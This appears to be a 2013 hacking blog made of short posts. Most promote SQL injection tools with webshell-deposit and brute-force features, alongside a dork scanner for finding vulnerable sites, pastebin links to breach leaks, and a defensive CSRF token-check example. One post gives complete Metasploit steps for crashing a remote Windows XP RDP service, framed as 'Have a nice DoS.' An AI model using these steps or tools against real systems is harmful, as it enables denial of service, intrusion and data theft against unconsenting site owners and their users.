May 25, 2013

jSQL Injection - Java tool for automatic database injection



jSQL Injection is a lightweight application used to find database information from a distant server.

jSQL is free, open source and cross-platform (Windows, Linux, Mac OS X, Solaris).

Version 0.4 features:
  • GET, POST, header, cookie methods
  • Normal, error based, blind, time based algorithms
  • Automatic best algorithm selection
  • Multi-thread control (start/pause/resume/stop)
  • Progression bars
  • Shows URL calls
  • Simple evasion
  • Proxy setting
  • Distant file reading
  • Webshell deposit
  • Terminal for webshell commands
  • Configuration backup
  • Update checker
  • Admin page checker
  • Brute forcer (md5 mysql...)
  • Coder (encode decode base64 hex md5...)
  • Supports MySQL
Source: http://hack-tools.blackploit.com/2013/05/jsql-injection-v04-java-tool-for.html


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

May 23, 2013

Multiple information leak and twitter POST SQL Injection Vulnerability

Check this out.

CNN Hacked: http://pastebin.com/YQLv6t3E
Twitter POST SQL Injection Vulnerability: http://pastebin.com/itA0quXu
South African Police Service website was hacked: http://mybroadband.co.za/news/security/78516-saps-website-hacker-interviewed.html



SQL Poizon v1.1 – SQLi Exploit Scanner, Search Hunter, Injection Builder Tool

SQL Poizon v1.1 (SQLi Exploit Scanner, Search Hunter, Injection Builder Tool) is a tool that automatically scans websites through dorks and finds vulnerabilities in them. It is easy to use and powerful, and it can find vulnerable sites in any country.

Source: http://www.rianul.com/blog/sql-poizon-v1-1-sqli-exploit-scanner-search-hunter-injection-builder-tool

Howto: Optimizing Remote Desktop Connection

1. Start -> "Run"

2. Use "mstsc" -> "Show options"

3. Optimize the settings you want

Source: http://www.maketecheasier.com/speeding-up-remote-desktop-connection/2013/05/22


Howto: Use Alfa Network AWUS036H with your Raspbmc (Raspberry Pi)

I tried to use my wireless USB (AWUS036H) with my Raspbmc to connect to my wireless network, but it did not work. I don't know why, but when I looked at the log in the console, it said that my password was incorrect. WTF!!!! I'm bloody sure about my password because my other devices can connect to my wireless network with this password. I tried to update & upgrade my Raspbmc, but it still did not work. So I tried to install another program add-on to resolve it. After trying many programs and add-ons, I used "Network-Manager" to resolve this problem.

1. Browse to your Program -> Addons

2. Install "Network Manager"

3. Connect your Alfa Network device

4. Delete old network config and add new network

5. When you click add, it will scan wireless network

6. When you click to your wireless network, insert your password

7. Wait for it to connect

8. At the bottom of Network-Manager, you will see the message "connected" :)

9. Done


Howto: Play ISO on Raspbmc (Raspberry Pi)

1. Copy ISO to your drive

2. Mount it
mount -o loop /path/to/iso.file /path/to/mountpoint

3. Browse in your Video and play it.


May 20, 2013

Howto: EXPLOIT Remote Desktop Protocol(RDP) On Windows XP With Metasploit

1. Open msfconsole

2. use auxiliary/dos/windows/rdp/ms12_020_maxchannelids

3. Set RHOST and run

4. Have a nice DoS.


May 19, 2013

Tool: CSRF Tool



So, here is a short reminder about mitigation:
Every state-changing (POST) request must contain a random token. The server side must check it before processing the request, using the value stored in the received cookies: cookies[:token] == params[:token]. If any POST endpoint lacks it, something is clearly wrong with the implementation.
To make the world a better place, I created a simple and handy CSRF Tool: homakov.github.io

  1. Copy as Curl from Web Inspector, paste into the text field and get a working template in a few clicks.
  2. No hassle. Researchers need a playground to demonstrate CSRF; with CSRF Tool you can simply give a link with a working template.
  3. No disclosure. The fragment (the part after #) is not sent to the server side, so I am not able to track the CSRFs you currently research (GitHub Pages don't have a server side anyway). The link to a template contains all information inside.
  4. Auto-submit for more fun, Base64 makes URL longer but hides the template.
  5. Add new fields and modify existing ones, change request method and endpoint path seamlessly. 
  6. Post into iframe (which is carefully sandboxed) or a new window, try Referrer-free submission and so on.
Source: http://homakov.blogspot.com/2013/05/csrf-tool.html
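
The token check from the mitigation reminder above, as an added example that is not part of the original post or of CSRF Tool itself. It implements `cookies[:token] == params[:token]` for state-changing requests; the function names and the plain-hash `cookies`/`params` arguments are assumptions made for illustration.

```ruby
require 'securerandom'

# Methods that must never change state and therefore need no token.
SAFE_METHODS = %w[GET HEAD OPTIONS].freeze

# Fresh random token: the server sets it as a cookie and embeds the same
# value in every form it renders.
def issue_csrf_token
  SecureRandom.urlsafe_base64(32)
end

# Constant-time comparison, so the check does not reveal how many leading
# bytes of a guessed token were correct. Missing or empty values never match.
def tokens_match?(a, b)
  return false unless a.is_a?(String) && b.is_a?(String)
  return false if a.empty? || a.bytesize != b.bytesize
  diff = 0
  a.bytes.zip(b.bytes) { |x, y| diff |= x ^ y }
  diff.zero?
end

# cookies[:token] == params[:token], enforced on every state-changing request.
# A cross-site form makes the browser send the cookie automatically, but the
# foreign page cannot read the cookie to copy its value into the parameters.
# `cookies` and `params` are plain hashes here (assumption for this example).
def csrf_ok?(http_method, cookies, params)
  return true if SAFE_METHODS.include?(http_method.to_s.upcase)
  tokens_match?(cookies[:token], params[:token])
end

# Constructed sample requests showing which ones the check accepts.
def sample_results
  t = issue_csrf_token
  {
    form_with_token:  csrf_ok?('POST', { token: t }, { token: t, amount: '10' }),
    forged_no_token:  csrf_ok?('POST', { token: t }, { amount: '10' }),
    forged_bad_token: csrf_ok?('POST', { token: t }, { token: 'guess' }),
    no_cookie_at_all: csrf_ok?('POST', {}, { token: '' }),
    read_only_get:    csrf_ok?('GET', {}, {})
  }
end

puts sample_results if __FILE__ == $PROGRAM_NAME
```
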



Tool: DroidSQLi - The First MySQL Injection Tool On Android

DroidSQLi is the first automated MySQL Injection tool for Android. It allows you to test your MySQL-based web application against SQL injection attacks.

DroidSQLi supports the following injection techniques:
- Time based injection
- Blind injection
- Error based injection
- Normal injection
It automatically selects the best technique to use and employs some simple filter evasion methods.


Source: http://backtrack-page.blogspot.com/2013/05/droidsqli-first-automated-mysql.html

